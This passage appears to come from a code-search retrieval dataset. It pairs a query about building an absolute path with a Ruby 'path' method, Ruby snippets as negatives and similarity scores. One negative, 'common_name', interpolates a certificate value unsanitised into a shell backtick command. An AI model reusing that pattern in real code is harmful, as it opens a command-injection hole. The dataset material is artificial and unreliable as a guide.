"def name\n\t\tif name_source.present?\n\t\t\tproviders = [\"twitter\",\"facebook\",\"google_oauth2\",\"lastfm\",\"vimeo\"]\n\t\t\tp,v = name_source.split(\"::\",2)\n\t\t\treturn name_source unless p.in? providers\n\t\t\tl = self.links.find_by(provider: p)\n\t\t\tif l\n\t\t\t\tnames = l.names\n\t\t\t\treturn names[v.to_sym] if names.is_a? Hash and v and names[v.to_sym]\n\t\t\tend\n\t\tend\n\t\t\n\t\treturn custom_name if custom_name.present?\n\t\treturn email.split('@')[0].titleize if email.present?\n\t\tUser.default_name\n\tend",
"def fqdn\n \"#{to_label}.example.com\"\n end",
"def desired_hostname\n if path.start_with?('/foo/en')\n Rails.env.staging? ? 'foo-staging.infopark.com' : 'www.foo.com'\n else\n # Default hostname\n Rails.env.staging? ? 'website-staging.infopark.com' : 'www.website.com'\n end\n end",
"def common_name\n subject = %x{echo \"#{self.certificate}\" | openssl x509 -noout -subject}\n subject.gsub(/^(.*)CN=/, '').strip\n end"
] | [
"0.8175684",
"0.7700664",
"0.7595606",
"0.7432824",
"0.7319022",
"0.725847",
"0.7250591",
"0.7250591",
"0.72492355",
"0.7109443",
"0.7090248",
"0.6883639",
"0.6878133",
"0.6850288",
"0.68029255",
"0.6796222",
"0.67310333",
"0.6676832",
"0.66764206",
"0.6668549",
"0.6668549",
"0.6653275",
"0.6630305",
"0.6531664",
"0.6529798",
"0.65050757",
"0.65046287",
"0.6501656",
"0.64949745",
"0.6490035",
"0.64815974",
"0.6474123",
"0.6460769",
"0.64503264",
"0.64405",
"0.6437295",
"0.64338404",
"0.64242893",
"0.64137065",
"0.64121264",
"0.63966477",
"0.6388011",
"0.63480294",
"0.63399565",
"0.6330248",
"0.6313984",
"0.63130635",
"0.6310998",
"0.63075113",
"0.6299173",
"0.6296849",
"0.6296849",
"0.62944925",
"0.62934476",
"0.6291391",
"0.62827",
"0.6254267",
"0.62514156",
"0.6247521",
"0.62370735",
"0.62353754",
"0.621747",
"0.6215979",
"0.621459",
"0.62117594",
"0.61995834",
"0.6188141",
"0.6182316",
"0.618003",
"0.61690855",
"0.6166098",
"0.6166098",
"0.6157156",
"0.61558837",
"0.61558837",
"0.6149821",
"0.61423457",
"0.6138159",
"0.6124302",
"0.61171246",
"0.61078244",
"0.6106844",
"0.6106844",
"0.610097",
"0.60776657",
"0.60774946",
"0.6069672",
"0.6047396",
"0.6045986",
"0.6038102",
"0.601777",
"0.6000847",
"0.5999372",
"0.5999012",
"0.598806",
"0.598806",
"0.59720314",
"0.5966994",
"0.5966244",
"0.59635323"
] | 0.7147614 | 9 |
Provide an absolute pathname within the current brewed's directory tree when provided relative path components. | def path(*path)
[dir, *path].reduce(:+)
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def absolute_path(path, reference = @pwd)\n path = File.expand_path(File.join(reference, path)) unless path.start_with? '/'\n path\n end",
"def relative_path_from(from); end",
"def abspath path\n if path[0] != '/'\n @homedir + '/' + path\n else\n path\n end\n end",
"def relative_path\n @relative_path ||= File.join(*[@dir, @name].map(&:to_s).reject(&:empty?)).delete_prefix(\"/\")\n end",
"def relative_path(from, to); end",
"def relative_to_absolute(path)\n if Pathname.new(path).absolute?\n Pathname.new(path)\n else\n Pathname.new(\"#{Pathname.pwd}/#{path}\")\n end\n end",
"def relative_path(*relative)\n Pathname.pwd.join(*(relative.flatten.map(&:to_s))).expand_path\n end",
"def absolute_path(path)\n path = Pathname.new(path)\n return Pathname.new(@config.base_path) + path unless path.absolute?\n path\n end",
"def absolutize_path(path = nil)\n \"#{root_path}#{path}\"\n end",
"def absolute_path(relative_path)\n quoted_string(File.expand_path(File.join(File.dirname(options[:filename]), relative_path.value)))\n end",
"def root_path(*args)\n relative = File.join(*args)\n return relative if relative.expand_path == relative\n root.expand_path / relative\n end",
"def root_path(*args)\n relative = File.join(*args)\n return relative if relative.expand_path == relative\n root.expand_path / relative\n end",
"def relative_path(path = @pwd, to = @root)\n Pathname.new(path).relative_path_from(Pathname.new(to)).to_s\n end",
"def absolute_uri_path(path)\n \"#{root_uri}#{path}\"\n end",
"def resolve_path(path)\n unless Pathname.new(path).absolute?\n File.join(Dir.pwd, path)\n else\n path\n end\nend",
"def resolve_path(path)\n unless Pathname.new(path).absolute?\n File.join(Dir.pwd, path)\n else\n path\n end\nend",
"def relative_directory\n return '' unless @directory_root\n @path - @directory_root - name\n end",
"def relative_path; end",
"def relative_path; end",
"def relative_path; end",
"def relative_path; end",
"def relative_path; end",
"def relative_path(path)\n path.split('/').drop(5).join('/')\nend",
"def relative_path\n @relative_path ||= PathManager.join(@dir, @name).delete_prefix(\"/\")\n end",
"def absolute_path(relative_path)\n if relative_path.start_with?(\"/\")\n relative_path\n else\n File.join(@@project_root, relative_path)\n end\n end",
"def resolve_relative_path(path, base_path)\n p = Pathname(base_path)\n p = p.dirname unless p.extname.empty?\n p += path\n\n p.cleanpath.to_s\n end",
"def abspath(file)\n File.absolute_path(file)\nend",
"def relative_path path, base\n (root? path) && (offset = descends_from? path, base) ? (path.slice offset, path.length) : path\n end",
"def resolvePath(possiblyRelativePath, rootDir)\n\t\tpath = Pathname.new(possiblyRelativePath)\n\t\tif(path.absolute?()) then\n\t\t\treturn path.to_s()\n\t\telse\n\t\t\trootPath = Pathname.new(rootDir)\n\t\t\treturn rootPath.join(path)\n\t\tend\n\tend",
"def relative_path\n self.path.sub(File.expand_path(options[:root_dir]) + '/', '')\n end",
"def relative_path\n @relative_path ||= File.join(@dir, @name)\n end",
"def qualify_path(path, root = @app_dir)\n \"$PWD/#{Pathname.new(path).relative_path_from(Pathname.new(root))}\"\n end",
"def getFullPath(relativePath)\n return baseDir + relativePath\n end",
"def abs_path_with(rel_path)\n path = abs_path\n return rel_path if path.nil?\n return \"#{path}.#{rel_path}\"\n end",
"def relative_path\n must_be File\n Pathname.new(self.full_path).relative_path_from(Pathname.new(Dir.pwd)).to_s\n end",
"def relative_path_to(path, relative_to = nil)\n if relative_to\n path = File.expand_path(\n # symlink, e.g. \"../../../../grid5000/environments/etch-x64-base-1.0.json\"\n path,\n # e.g. : File.join(\"/\", File.dirname(\"grid5000/sites/rennes/environments/etch-x64-base-1.0\"))\n File.join('/', File.dirname(relative_to))\n ).gsub(%r{^/}, '')\n end\n path\n end",
"def relative_path(pathname)\n pwd = Pathname.new('.').realpath\n pathname.file_ref.real_path.relative_path_from(pwd)\n end",
"def rel_path(path)\n Pathname(path).expand_path.relative_path_from(Pathname(Dir.pwd))\n end",
"def relativePath\n return (parentPathElements + [name]).join(\"/\")\n end",
"def relative_path\n @relative_path ||= absolute_path.sub(/^#{Bookshelf::remote_folder}\\/?/,'')\n end",
"def relative_path(path)\n\t\tSass::Script::String.new(File.join(File.expand_path(Dir.pwd), path.value))\n\tend",
"def relative_path(target = '.')\n my_path = Pathname.new(path).expand_path\n target_path = Pathname.new(target.to_s).expand_path\n target_path = target_path.dirname if target_path.file?\n\n new_path = my_path.relative_path_from(target_path).to_s\n\n return new_path if new_path.index('.') == 0\n \"./#{new_path}\"\n end",
"def relative_path(target = '.')\n my_path = Pathname.new(path).expand_path\n target_path = Pathname.new(target.to_s).expand_path\n target_path = target_path.dirname if target_path.file?\n\n new_path = my_path.relative_path_from(target_path).to_s\n\n return new_path if new_path.index('.') == 0\n \"./#{new_path}\"\n end",
"def get_absolute_path(file)\n File.expand_path file\nend",
"def relative_path\n name\n end",
"def resolve_path(path, reference)\n # Absolute URL\n if path =~ %r{^(/|[a-z]+:)}\n if @options[:document_root].nil?\n msg = \"Cannot resolve absolute path '#{path}' without document root option\"\n raise ArgumentError.new(msg)\n end\n\n path.sub!(%r{^[a-z]+://[^/]+/}, '')\n return File.expand_path(File.join(@options[:document_root], path))\n end\n\n File.expand_path(File.join(File.dirname(reference), path))\n end",
"def relative_path(filename)\n pieces = split_filename(File.expand_path(filename))\n File.join(pieces[@mount_dir_pieces.size..-1])\n end",
"def relative_path(path)\n path = destination_root.relative_path(path) || path\n path.empty? ? \".\" : path\n end",
"def relative_dir(path, *args)\n relative_path = args ? args.join('/') : ''\n Pathname(path).dirname.join(relative_path)\n end",
"def full_path_for(path)\n path = \"/#{path}\" unless path[0..0] == '/'\n path\n end",
"def absolute_path_base\n absolute_path.gsub File.extname( absolute_path ), ''\n end",
"def relative_pathname\n @relative_pathname ||= Pathname.new(relativize_root_path(pathname))\n end",
"def relative_path(path)\n path[self.prefix.size..-1].gsub(%r{^/}, '').tap do |pth|\n #puts \"self.prefix=#{self.prefix}, path=#{path}, result=#{pth}\"\n end\n end",
"def relative_path(path)\n path = File.expand_path(File.dirname(__FILE__) + '/' + path)\n \"'#{path}'\"\nend",
"def path(*relative)\n File.join(self.bundle_dir, *relative)\n end",
"def relroot\n Pathname.new(File.expand_path(path)).\n relative_path_from(Pathname.new(File.expand_path(root))).to_s\n end",
"def abspath(path)\n Pathname.new(File.expand_path(path)).realpath.to_s\n end",
"def to_absolute_path(file, dir_str)\n Pathname.new(file).absolute? ? file : File.expand_path(file, dir_str)\n end",
"def relative_directory; end",
"def append_to_home_if_not_absolute( p )\n path = Pathname.new( p )\n unless path.absolute? then\n path = Pathname.new( home_dir ) + path\n end\n return path.to_s\n end",
"def absolutepath\n if absolute?\n self\n elsif to_s == \".\"\n realpath\n else\n parent.absolutepath + self.basename\n end\n end",
"def relative_path(p = path)\n anchor = p.ftype == \"directory\" ? @root_path : \"public\"\n p.relative_path_from(Pathname.new(anchor).realpath)\n end",
"def realpath(*args)\n unless args.empty?\n warn \"The argument for Pathname#realpath is obsoleted.\"\n end\n force_absolute = args.fetch(0, true)\n\n\t\t# XXX: see http://wiki.rubyonrails.com/rails/pages/Gotcha\n is_absolute = %r{\\A/}\n\t\ttop = '/'\n\t\tif Config::CONFIG['arch'] =~ %r{mswin32}i\n\t\t\tis_absolute = %r{\\A[A-Za-z]:/}\n\t\t\ttop = ''\n\t\tend\n if is_absolute =~ @path\n unresolved = @path.scan(%r{[^/]+})\n elsif force_absolute\n # Although POSIX getcwd returns a pathname which contains no symlink,\n # 4.4BSD-Lite2 derived getcwd may return the environment variable $PWD\n # which may contain a symlink.\n # So the return value of Dir.pwd should be examined.\n unresolved = Dir.pwd.scan(%r{[^/]+}) + @path.scan(%r{[^/]+})\n else\n top = ''\n unresolved = @path.scan(%r{[^/]+})\n end\n resolved = []\n\n until unresolved.empty?\n case unresolved.last\n when '.'\n unresolved.pop\n when '..'\n resolved.unshift unresolved.pop\n else\n loop_check = {}\n while (stat = File.lstat(path = top + unresolved.join('/'))).symlink?\n symlink_id = \"#{stat.dev}:#{stat.ino}\"\n raise Errno::ELOOP.new(path) if loop_check[symlink_id]\n loop_check[symlink_id] = true\n if %r{\\A/} =~ (link = File.readlink(path))\n top = '/'\n unresolved = link.scan(%r{[^/]+})\n else\n unresolved[-1,1] = link.scan(%r{[^/]+})\n end\n end\n next if (filename = unresolved.pop) == '.'\n if filename != '..' && resolved.first == '..'\n resolved.shift\n else\n resolved.unshift filename\n end\n end\n end\n\n if top == '/'\n resolved.shift while resolved[0] == '..'\n end\n \n if resolved.empty?\n Pathname.new(top.empty? ? '.' : '/')\n else\n Pathname.new(top + resolved.join('/'))\n end\n end",
"def rel relative_path\r\n return File.dirname(__FILE__) + \"/../\" + relative_path\r\nend",
"def cleaned_relative_path; end",
"def cleaned_relative_path; end",
"def relative_path\n @local_path.relative_path_from(@platform.local_path)\n end",
"def relative_path(val = NULL)\n if null?(val)\n @relative_path || \".\"\n else\n @relative_path = val\n end\n end",
"def ref_path(dir, subdir, path)\n # this stuff is overkill, and doesn't work anyways:\n #depth = dir.split(File::SEPARATOR).reject{ |d| d.empty? }.count\n #parent_dirs = Array.new(depth, '..')\n File.join('..', ContentRepo::ResourceNode::PATHNAME, path )\n end",
"def relativepath(abspath, relativeto)\n path = abspath.split(File::SEPARATOR)\n rel = relativeto.split(File::SEPARATOR)\n while (path.length > 0) && (path.first == rel.first)\n path.shift\n rel.shift\n end\n ('..' + File::SEPARATOR) * (rel.length - 1) + path.join(File::SEPARATOR)\n end",
"def explicit_relative(path)\n # Paths that do not start with \"/\", \"./\", or \"../\" will be prefixed with ./\n path.sub(%r(^(?!\\.{0,2}/)), './')\n end",
"def relative_file_path(file_path)\n file_path.gsub(/#{pwd}\\//, '')\n end",
"def abspath\n \"#{repo_base_path}/#{self.git_repo_path}\"\n end",
"def relativize_path(path)\n path.to_s.gsub(/^\\/?#{Regexp.escape(root_path.to_s)}\\/?/, '')\n end",
"def relativize( path ) # :doc:\n p = Pathname.new( path )\n unless p.relative?\n p = p.relative_path_from( Pathname.pwd ).to_s\n p += '/' if path[-1] == '/'\n path = p if p.length < path.length\n end\n path\n end",
"def full_path\n container.root.join(path)\n end",
"def full_path\n container.root.join(path)\n end",
"def get_relative_path(bag_path_string)\n bag_path = Pathname.new bag_path_string\n loc_path = Pathname.new @base_path\n \n return bag_path.relative_path_from(loc_path)\n end",
"def to_absolute_path\n File.join('', to.path(:default).to_s)\n end",
"def path\n @path ||= filters.uri_escape(absolute_url) if absolute_url\n end",
"def path\n @path ||= filters.uri_escape(absolute_url) if absolute_url\n end",
"def relativePath\n #N Without this the path elements won't be joined together with \"/\" to get the relative path as a single string\n return @pathElements.join(\"/\")\n end",
"def relative_path\n @relative_path ||= path.sub(\"#{site.collections_path}/\", \"\")\n end",
"def realpath\n if(self.page)\n return Rails.application.routes.url_helpers.page_path(self.page)\n end\n '/' + self.explicit_path\n end",
"def path_from(relative_path)\n path.sub(/^#{Regexp.escape(relative_path)}\\/?/, '')\n end",
"def path_from(relative_path)\n path.sub(/^#{Regexp.escape(relative_path)}\\/?/, '')\n end",
"def relative_to_bucket_path(rel_path)\n raise ArgumentError.new(\"Must provide a non-nil path\") if rel_path.nil?\n \n if @subpath_prefix.nil?\n return rel_path\n end\n \n @subpath_prefix + rel_path\n end",
"def realpath(*args)\n unless args.empty?\n warn \"The argument for Path::Name#realpath is obsoleted.\"\n end\n force_absolute = args.fetch(0, true)\n\n if @path.first == ''\n top = '/'\n unresolved = @path.slice(1..-1) #.scan(%r{[^/]+})\n elsif force_absolute\n # Although POSIX getcwd returns a pathname which contains no symlink,\n # 4.4BSD-Lite2 derived getcwd may return the environment variable $PWD\n # which may contain a symlink.\n # So the return value of Dir.pwd should be examined.\n top = '/'\n unresolved = Dir.pwd.split(%r{/}) + @path\n else\n top = ''\n unresolved = @path.dup #.scan(%r{[^/]+})\n end\n resolved = []\n\n until unresolved.empty?\n case unresolved.last\n when '.'\n unresolved.pop\n when '..'\n resolved.unshift unresolved.pop\n else\n loop_check = {}\n while (stat = File.lstat(path = top + unresolved.join('/'))).symlink?\n symlink_id = \"#{stat.dev}:#{stat.ino}\"\n raise Errno::ELOOP.new(path) if loop_check[symlink_id]\n loop_check[symlink_id] = true\n if %r{\\A/} =~ (link = File.readlink(path))\n top = '/'\n unresolved = link.split(%r{/}) #scan(%r{[^/]+})\n else\n unresolved[-1,1] = link.split(%r{/}) #.scan(%r{[^/]+})\n end\n end\n next if (filename = unresolved.pop) == '.'\n if filename != '..' && resolved.first == '..'\n resolved.shift\n else\n resolved.unshift filename\n end\n end\n end\n\n if top == '/'\n resolved.shift while resolved[0] == '..'\n end\n\n if resolved.empty?\n Path::Name.new(top.empty? ? '.' : '/')\n else\n if top.empty?\n Path::Name.new(resolved)\n else\n Path::Name.new(resolved, true)\n end\n end\n end",
"def getFullPath(relativePath)\n return @baseDirectory.fullPath + relativePath\n end",
"def full_path; end",
"def relative_path\n File.join(@repo, @bundle)\n end",
"def relative_path(filename)\n @mount_dir_pieces ||= @mount_dir.size\n pieces = split_filename(File.expand_path(filename))\n File.join(pieces[@mount_dir_pieces..-1])\n end",
"def relative_path_from(entry)\n @path.relative_path_from(entry.path)\n end",
"def relative_path\n @relative_path ||= File.join(@dir, @target)\n end",
"def full_path\n path\n end",
"def relative_path(path_to, path_from)\n path_from ||= \"\"\n path_to = Pathname.new(path_to)\n dir_from = Pathname.new(path_from).dirname\n\n path_to.relative_path_from(dir_from).to_s\n end",
"def base_dir_for_path_parameters; end",
"def getRealPath(path) Pathname.new(path).realpath.to_s; end",
"def getRealPath(path) Pathname.new(path).realpath.to_s; end",
"def relative_directory\n @relative_directory ||= \"_#{label}\"\n end",
"def home(subcomponent = \"\")\n File.expand_path(\"#{@basepath}/#{subcomponent}\")\n end"
] | [
"0.7357174",
"0.7348903",
"0.73462665",
"0.7299915",
"0.7296331",
"0.72358",
"0.71377474",
"0.7120952",
"0.7062218",
"0.704706",
"0.70403504",
"0.70403504",
"0.70402324",
"0.7012378",
"0.7000483",
"0.7000483",
"0.6994019",
"0.69636405",
"0.69636405",
"0.69636405",
"0.69636405",
"0.69636405",
"0.695129",
"0.6946913",
"0.6931151",
"0.6917314",
"0.6911458",
"0.6898736",
"0.6858941",
"0.6848206",
"0.68465906",
"0.68410844",
"0.68290734",
"0.68237805",
"0.6815903",
"0.6809527",
"0.6797236",
"0.6797128",
"0.6791335",
"0.6784773",
"0.6765788",
"0.6758406",
"0.6758406",
"0.6754318",
"0.67079383",
"0.6687116",
"0.66837204",
"0.6680274",
"0.66762936",
"0.6652575",
"0.6641354",
"0.6633439",
"0.6631779",
"0.66313505",
"0.6611076",
"0.6610232",
"0.6601402",
"0.65852916",
"0.65772736",
"0.65608597",
"0.6544328",
"0.6539652",
"0.6514666",
"0.6510255",
"0.65079427",
"0.65079427",
"0.64619076",
"0.64582837",
"0.6444969",
"0.64445454",
"0.6436225",
"0.6413355",
"0.64117026",
"0.6404726",
"0.64042956",
"0.6402828",
"0.6402828",
"0.64012736",
"0.6387289",
"0.6385002",
"0.6385002",
"0.6378417",
"0.63739824",
"0.63732547",
"0.6369799",
"0.6369799",
"0.63689786",
"0.63578415",
"0.63570845",
"0.63408315",
"0.6338654",
"0.63339907",
"0.6331882",
"0.6323448",
"0.63227093",
"0.6321696",
"0.63170934",
"0.63032794",
"0.63032794",
"0.62953454",
"0.6288676"
] | 0.0 | -1 |
Provide an absolute pathname within the brewed's public directory tree. | def public(*path)
_public.nil? ? nil : [_public, *path].reduce(:+)
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def absolute_path(path)\n File.join(self.mounting_point.path, 'public', path)\n end",
"def public_path=(_arg0); end",
"def absolute_url\n domain + path\n end",
"def public_path\n # TODO: this might present an attack vector if the file is outside the web_root\n options[:web_root].to_s + '/' + self.relative_path.gsub(\"\\\\\", \"/\")\n end",
"def public_path_for(sling)\n return home_path_for(sling) + \"/public\"\n end",
"def abspath path\n if path[0] != '/'\n @homedir + '/' + path\n else\n path\n end\n end",
"def relative_directory; end",
"def abspath\n \"#{repo_base_path}/#{self.git_repo_path}\"\n end",
"def absolute_url\n return unless fileable?\n Rails.application.routes.default_url_options[:host] ||= \"http://localhost:3000\"\n Rails.application.routes.url_helpers.root_url[0..-2] + file.url\n end",
"def local_uri\n\n return nil unless self.uri\n u = full_uri\n u[0, 1] == '/' ? \"#{RAILS_ROOT}/public#{u}\" : u\n end",
"def absolute_uri_path(path)\n \"#{root_uri}#{path}\"\n end",
"def public_uri\n @public_uri ||= begin\n path = @rack_context.getInitParameter('public.root') || '/'\n path = \"/#{path}\" if path[0, 1] != '/'\n path.chomp!('/') unless path == '/'\n path\n end\n end",
"def relative_path\n @relative_path ||= absolute_path.sub(/^#{Bookshelf::remote_folder}\\/?/,'')\n end",
"def public_path; end",
"def public_path; end",
"def public_path; end",
"def basepath; end",
"def relative_path_from(from); end",
"def url; \"file:#{@root}\"; end",
"def abspath(file)\n File.absolute_path(file)\nend",
"def relative_directory\n return '' unless @directory_root\n @path - @directory_root - name\n end",
"def absolute_path(options = {})\n if !@absolute_path\n # Pre-conditions\n raise ArgumentError.new(\"No document root set\") if @document_root.nil?\n\n @absolute_path = filename.sub(%r{^#@document_root}, '').sub(/^\\/?/, '/')\n @absolute_path = \"#{Juicer::Asset::Path.host_with_scheme(options[:host])}#@absolute_path\"\n end\n\n path_with_cache_buster(@absolute_path, options)\n end",
"def relative_path; end",
"def relative_path; end",
"def relative_path; end",
"def relative_path; end",
"def relative_path; end",
"def absolute_import_dir\n File.join(Merb.root, \"public#{relative_import_dir}\")\n end",
"def url\n filepath.sub( %r{\\A#{Regexp.escape (Rails.root + \"public\").to_s}}, '').to_s\n end",
"def full_path\n container.root.join(path)\n end",
"def full_path\n container.root.join(path)\n end",
"def _uri_path\n \"#{@dir}.#{CGI.escape @reg}/#{CGI.escape @dss}\"\n end",
"def URLFor(locationRef)\n theLocation = NSFileManager.defaultManager\n .URLsForDirectory( locationRef,\n inDomains: NSUserDomainMask)\n .first\n theLocation.nil? ? NSURL.fileURLWithPath(NSHomeDirectory()) : theLocation\nend",
"def append_to_home_if_not_absolute( p )\n path = Pathname.new( p )\n unless path.absolute? then\n path = Pathname.new( home_dir ) + path\n end\n return path.to_s\n end",
"def fullpath; end",
"def absolutize_path(path = nil)\n \"#{root_path}#{path}\"\n end",
"def path\n @path ||= filters.uri_escape(absolute_url) if absolute_url\n end",
"def path\n @path ||= filters.uri_escape(absolute_url) if absolute_url\n end",
"def relative_url_root=(_arg0); end",
"def relative_url_root=(_arg0); end",
"def public_uri\n @public_uri ||=\n @rack_context.getInitParameter('public.root') || 'public'\n end",
"def relative_path(p = path)\n anchor = p.ftype == \"directory\" ? @root_path : \"public\"\n p.relative_path_from(Pathname.new(anchor).realpath)\n end",
"def public_path path, strict=true\n path_under 'public', path, strict\n end",
"def link_name(name)\n File.expand_path(File.join('~', '.' + File.basename(name)))\nend",
"def root_path(path) File.join(root, path) end",
"def absolute_url\n\t\treturn \"#{$domain}/#{self.photo.url}\"\n\tend",
"def relative_path(from, to); end",
"def home(subcomponent = \"\")\n File.expand_path(\"#{@basepath}/#{subcomponent}\")\n end",
"def full_path; end",
"def public_path\n raise \"An Entry must define a `public_path` in its Spec.\"\n end",
"def construct_document_root\n return Dir.pwd + \"/public\"\n end",
"def base_path\n @base_path ||= self.class.respond_to?(:base_path) ? self.class.base_path : Merb.dir_for(:public)\n end",
"def url\n ::File.join \"/\", path.to_s\n end",
"def absolute_path(path)\n path = Pathname.new(path)\n return Pathname.new(@config.base_path) + path unless path.absolute?\n path\n end",
"def relative_url_root; end",
"def relative_url_root; end",
"def relative_url_root; end",
"def root_file_path; end",
"def base_path\n Dir.pwd + \"/\"\n end",
"def public_path\n application && Pathname.new(application.paths[\"public\"].first)\n end",
"def path_in_public\n (sitemaps_path + filename).to_s\n end",
"def path\n (public_path + sitemaps_path + filename).expand_path.to_s\n end",
"def absolute_path\n if is_url?\n # Use the last path component without the query string plus the name\n # of the resource in Base64. This should be both mildly readable and\n # also unique per invocation.\n url_part = URI(path).path.split(/\\//).last\n base64_name = Base64.strict_encode64(name).gsub(/\\=/, '')\n ::File.join(Chef::Config[:file_cache_path], \"#{base64_name}_#{url_part}\")\n else\n ::File.expand_path(path, Chef::Config[:file_cache_path])\n end\n end",
"def to_absolute_path\n File.join('', to.path(:default).to_s)\n end",
"def public_path\n File.join adapter_folder, relative_folder\n end",
"def getRealPath(path) Pathname.new(path).realpath.to_s; end",
"def getRealPath(path) Pathname.new(path).realpath.to_s; end",
"def get_url(is_local = true)\n is_local ? (return '../../../www/public/') : (return 'https://whimsy.apache.org/public/')\n end",
"def href\n \"/admin/dav/#{path}\"\n end",
"def public_path\n @public_path ||= './public'\n end",
"def base_dir; end",
"def base_dir; end",
"def base_dir; end",
"def base_dir; end",
"def base_dir; end",
"def base_dir; end",
"def base_dir; end",
"def absolute?; !scheme.nil?; end",
"def linked_path\n File.readlink current_directory\n end",
"def absolute_path(path, reference = @pwd)\n path = File.expand_path(File.join(reference, path)) unless path.start_with? '/'\n path\n end",
"def public_rdf_storage_path\n rdf_storage_path 'public'\n end",
"def path\n \"repos/#{@user}/#{name}\"\n end",
"def get_absolute_path(file)\n File.expand_path file\nend",
"def path()\n return ::File.join(@root, @name)\n end",
"def path\n return File.join('', @public_path)\n end",
"def relative_path\n return self.avatar.match(/http[^|]*/)[0].to_s\n end",
"def absolute_url_for(uri, str)\n # TODO: use URI.parse() for better handling?\n return str if str =~ /^[|[:alpha:]]+:\\/\\//\n File.join(((uri.path.empty?) ? uri.to_s : File.dirname(uri.to_s)), \n str)\n end",
"def dir_alias()\n #This is a stub, used for indexing\n end",
"def sanitized_path(base_directory, questionable_path); end",
"def sanitized_path(base_directory, questionable_path); end",
"def sanitized_path(base_directory, questionable_path); end",
"def sanitized_path(base_directory, questionable_path); end",
"def sanitized_path(base_directory, questionable_path); end",
"def sanitized_path(base_directory, questionable_path); end",
"def directory\n (public_path + sitemaps_path).expand_path.to_s\n end",
"def absolute_url\n File.join(BLOG.url, url)\n end",
"def root( *args )\n if self.home =~ /^[a-zA-Z]:/\n self.home.to_s[0..3].fwf_filepath.join( *args )\n else\n \"/\".fwf_filepath.join( *args )\n end\n end",
"def public_path(options={})\n self.public_url\n end",
"def path\n @absolute_path.sub(%r{^#{Slimdown.config.location}/(.*)\\.md}, '\\1')\n end",
"def private_bin_dir\n return pretty_path(File.join(right_link_home_dir, 'bin'))\n end",
"def relative_path(options = {})\n File.join(self.site.content_dir(options), sanitize_filename(self.name))\n end"
] | [
"0.72411776",
"0.6842936",
"0.6810786",
"0.6754875",
"0.6727674",
"0.6700948",
"0.6620673",
"0.65827525",
"0.65568286",
"0.6503647",
"0.6487266",
"0.64696175",
"0.6449953",
"0.64441746",
"0.64441746",
"0.64441746",
"0.63983196",
"0.63731486",
"0.6365032",
"0.6364572",
"0.635311",
"0.63520664",
"0.6350717",
"0.6350717",
"0.6350717",
"0.6350717",
"0.6350717",
"0.6343104",
"0.6296191",
"0.62749004",
"0.62749004",
"0.62536263",
"0.6211883",
"0.62076277",
"0.6204191",
"0.61957824",
"0.6181119",
"0.6181119",
"0.6173139",
"0.6173139",
"0.61716014",
"0.61641747",
"0.61632526",
"0.6159094",
"0.6156053",
"0.6147174",
"0.61358654",
"0.61354995",
"0.61290354",
"0.61245704",
"0.6122677",
"0.6121278",
"0.6110789",
"0.6106721",
"0.610217",
"0.610217",
"0.610217",
"0.6100734",
"0.6100135",
"0.60883725",
"0.6084727",
"0.6079796",
"0.6073108",
"0.6066334",
"0.604829",
"0.6048018",
"0.6048018",
"0.60335857",
"0.6028245",
"0.60161746",
"0.6008993",
"0.6008993",
"0.6008993",
"0.6008993",
"0.6008993",
"0.6008993",
"0.6008993",
"0.6004936",
"0.6004735",
"0.5997278",
"0.59956056",
"0.5991994",
"0.5988158",
"0.59860307",
"0.5975274",
"0.59731245",
"0.59644717",
"0.5961942",
"0.5961641",
"0.5961641",
"0.5961641",
"0.5961641",
"0.5961641",
"0.5961641",
"0.5947674",
"0.5931356",
"0.593094",
"0.59274983",
"0.5926701",
"0.59239143",
"0.5923749"
] | 0.0 | -1 |
Provide the absolute path to the directory containing the log files. | def log(*path)
[log_root, *path].reduce(:+)
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def log_path\n case Merb::Config[:log_file]\n when String then File.dirname(Merb::Config[:log_file])\n else Merb.root_path(\"log\")\n end\n end",
"def log_path\n case Merb::Config[:log_file]\n when String then File.dirname(Merb::Config[:log_file])\n else Merb.root_path(\"log\")\n end\n end",
"def log_directory\n File.join(@relative_to_base, LOG_DIRECTORY_NAME)\n end",
"def log_directory\n @relative_location.end_with?('/') ? @relative_location + LOG_DIRECTORY_NAME : @relative_location + '/' + LOG_DIRECTORY_NAME\n end",
"def log_path\n @options['log_path'] ? File.expand_path(@options['log_path'], @config.root) : default_log_path\n end",
"def log_dir\n return pretty_path(File.join(Dir::COMMON_APPDATA, 'RightScale', 'log'))\n end",
"def log_path(name, log_dir)\n # TODO ?\n end",
"def path_log\n @path_log ||= File.join(folder, 'log.txt')\n end",
"def logdir\n File.expand_path(\"../../../log/library/#{id}\", File.dirname(__FILE__))\n end",
"def log_directory\n @log_directory ||= begin\n Rails.root.join('log')\n rescue => e\n File.join Dir.pwd, 'log'\n end\n end",
"def default_log_path\n if @config.log_root\n File.join(@config.log_root, default_log_file_name)\n else\n nil\n end\n end",
"def log_root\n @log_root ||= File.expand_path(\"../../log\", __FILE__)\n end",
"def log_file(log_path = nil)\n # Get hostname\n host = session.sys.config.sysinfo[\"Computer\"]\n\n # Create Filename info to be appended to downloaded files\n filenameinfo = \"_\" + ::Time.now.strftime(\"%Y%m%d.%M%S\")\n\n # Create a directory for the logs\n logs = if log_path\n ::File.join(log_path, 'logs', 'persistence', Rex::FileUtils.clean_path(host + filenameinfo))\n else\n ::File.join(Msf::Config.log_directory, 'persistence', Rex::FileUtils.clean_path(host + filenameinfo))\n end\n\n # Create the log directory\n ::FileUtils.mkdir_p(logs)\n\n # logfile name\n logfile = logs + ::File::Separator + Rex::FileUtils.clean_path(host + filenameinfo) + \".rc\"\n logfile\n end",
"def get_log_dir()\n \"#{node[:neon_logs][:flume_log_dir]}/#{node[:neon_logs][:flume_service_name]}\"\n end",
"def default_log_file_location\n File.join(::Rails.root, 'log', \"solr_\" + ::Rails.env + \".log\")\n end",
"def log\n \"#{self.dir}.log\"\n end",
"def log_filename\n date_str = `date +%d%b%Y`[0..-2]\n LOG_DIR + \"Log#{date_str}.log\"\nend",
"def log_file\n File.join(FileUtils.pwd, 'log', \"sunspot-solr.log\")\n end",
"def self_log_file\n return File.join(File.dirname(__FILE__), 'sshsurveyor.log')\n end",
